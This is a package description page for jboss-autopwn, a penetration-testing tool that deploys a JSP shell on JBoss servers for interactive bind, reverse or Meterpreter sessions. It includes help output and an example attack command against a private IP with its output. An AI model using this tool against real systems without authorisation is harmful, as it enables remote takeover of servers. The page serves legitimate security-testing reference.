jboss-autopwn
jboss-autopwn Package Description
This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
Features include:
- Multiplatform support – tested on Windows, Linux and Mac targets
- Support for bind and reverse bind shells
- Meterpreter shells and VNC support for Windows targets.
Tools included in the jboss-autopwn package
jboss-win – JBoss Windows autopwn
root@kali:~# root@kali:~# jboss-win
[!] JBoss Windows autopwn
[!] Usage: ./e2.sh server port
[!] Christian Papathanasiou cpapathanasiou@trustwave.com
[!] Trustwave SpiderLabs
[!] JBoss Windows autopwn
[!] Usage: ./e2.sh server port
[!] Christian Papathanasiou cpapathanasiou@trustwave.com
[!] Trustwave SpiderLabs
jboss-linux – JBoss *nix autopwn
root@kali:~# jboss-linux
[!] JBoss *nix autopwn
[!] Usage: ./e.sh server port
[!] Christian Papathanasiou
[!] Trustwave SpiderLabs
[!] JBoss *nix autopwn
[!] Usage: ./e.sh server port
[!] Christian Papathanasiou
[!] Trustwave SpiderLabs
jboss-autopwn Usage Example
Attack the target server (192.168.1.200) on the specified port (8080), redirecting stderr (2> /dev/null):
root@kali:~# jboss-linux 192.168.1.200 8080 2> /dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[!] Cound not create BSH script..
[x] Now deploying .war file:
[x] Retrieving cookie
[x] Now creating BSH script...
[!] Cound not create BSH script..
[x] Now deploying .war file:
No comments